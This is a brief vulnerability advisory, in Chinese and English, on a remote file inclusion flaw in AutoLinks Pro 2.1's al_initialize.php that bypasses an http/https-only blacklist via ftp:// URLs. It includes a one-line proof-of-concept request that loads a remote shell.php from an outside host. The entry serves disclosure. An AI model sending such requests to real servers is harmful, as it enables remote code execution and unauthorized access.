https://www.exploit-db.com/exploits/26208
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200509-009

AutoLinksPro2.1版本中的al_initialize.php文件存在PHP远程文件包含漏洞。远程攻击者可利用该漏洞通过alpath参数中的”ftp://”URL执行任意的PHP代码，这样他就绕过了只检查”http”和”https”URL的不完整黑名单。

source: http://www.securityfocus.com/bid/14686/info

AutoLinks Pro is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access. 

http://www.example.com//al_initialize.php?alpath=ftp://host.com/shell.php?

来源:XF
名称:autolinks-alinitialize-file-include(22061)
链接:http://xforce.iss.net/xforce/xfdb/22061
来源:BID
名称:14686
链接:http://www.securityfocus.com/bid/14686
来源:SECUNIA
名称:16620
链接:http://secunia.com/advisories/16620/
来源:BUGTRAQ
名称:20050828AutoLinksPro2.1
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=112535379716486&w;=2